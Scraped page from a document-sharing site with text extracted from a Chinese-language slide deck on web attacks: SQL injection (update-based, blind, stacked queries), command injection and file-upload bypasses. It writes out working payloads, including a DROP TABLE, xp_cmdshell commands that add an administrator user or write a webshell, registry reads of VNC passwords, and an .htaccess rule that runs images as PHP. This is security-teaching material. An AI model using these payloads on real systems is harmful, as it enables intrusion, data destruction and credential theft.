小心因检查不确实而被绕过gifphp多重附档名.PPT

小心因检查不确实而被绕过gifphp多重附档名.PPT

  1. 1、本文档共79页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
小心因检查不确实而被绕过gifphp多重附档名

Update Based 發生於所有程式、所有資料庫環境下 利用程式更新資料時,插入欲撈取資料之SQL,以在更新後得到資料 儘量不要在注入的SQL後面加上 -- MSSQL 使用 + 結合字串 Oracle 使用 || 結合字串 ‘ + @@version + ‘ ‘ + (select name from master..sysdatabases where dbid=7) +’ ‘,email=(select … ),’ … Why ??? 本來的語法長這樣 Update Member Set email=‘[email]’, address=‘[地址]’ Where user=‘[使用者名稱]’ 插入SQL後成為 – Update Member Set email=‘‘ + user + ’’ , address=‘[地址]’ Where user=‘[使用者名稱]’ Blind 發生於所有程式、所有資料庫環境下 頁面沒有任何錯誤訊息供判斷,故稱 “Blind” 利用回應頁面的 “是” 與 “否” 判斷所注入的SQL是否執行成功 id=1 and 1=1 id=1 and 1=2 id=1 and (select top 1 ascii(substring(COLUMN,1,1)) from TABLE)79 Why ??? 本來的語法長這樣 Select * From News Where id= [網址參數id] 插入SQL後成為 – Select * From News Where id= 1 and 1=1 (1 and 1=2) 觀察兩次查詢的結果 Stack Query 發生於資料庫為 MSSQL 時 利用 ; 符號中止原查詢語句,注入欲執行之動作 可注入任何 SQL 語句,包含四大資料處理語法(SELECT/INSERT/DELETE/UPDATE)、及延伸程序等 id=1 ; drop table account;-- id=1 ; exec master..xp_cmdshell ‘net user Hacker Hacker /add’;-- 不正常的Query (1) 使用註解符號中斷 SQL 語句 /* -- 永遠成立的條件 or 1=1-- or 21-- ‘ or ‘’=‘ 不正常的Query (2) 測試查詢成功與否 and 1=1-- and 1=2-- ‘;declare @a int;-- 使查詢產生錯誤 進行不同型別的轉換 (字串-整數) @@version1 邏輯運算錯誤 1/0 依不存在的欄位排序 order by 100 不正常的Query (3) 使用union結合兩段query ‘ union select col1,col2,… from table-- 呼叫函數或延伸程序 ;exec master..xp_cmdshell ‘net user Hacker Hacker /add’;-- ;exec master..xp_cmdshell echo WEBSHELL path/a.asp‘-- ;exec master..xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3,Password;-- Command Injection 執行作業系統指令之參數來自使用者端 Example : Execute( “dir ” Request(“dir”) ) 插入指令分隔字元 ; | ` ` Listfile.asp?dir=C:\;net user hacker hacker /add File Upload Mis-Handling 檔案上傳功能 許多AP都有檔案上傳功能 上傳圖片、音樂、文件…. 控管不好的話,駭客可以上傳惡意程式 WebShell ? 控制後端Web 主機 傳小馬、換大馬 * 傳統防護機制 傳統檢查機制許多都有風險 Client-side validation 可被bypass ! MIME Type validation 可被假造! 攻擊者可透過自己寫的Script或是自動化程式,一樣利用HTTP POST方式來上傳檔案,但是自己竄改成假的MIME Type。 * 傳統防護機制(cont.) 某些平台設定本身有漏洞 : Apache + PHP 駭客上傳自己的系統設定檔 “.htaccess”, 內含 : AddType application/x-httpd-php .jpg 可以讓系統用 PHP 的執行方式來處理 .jpg 的檔案 filename.php.123 ?! Apache中遇到不認識的副檔名,會找認識的副

文档评论(0)

2105194781 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档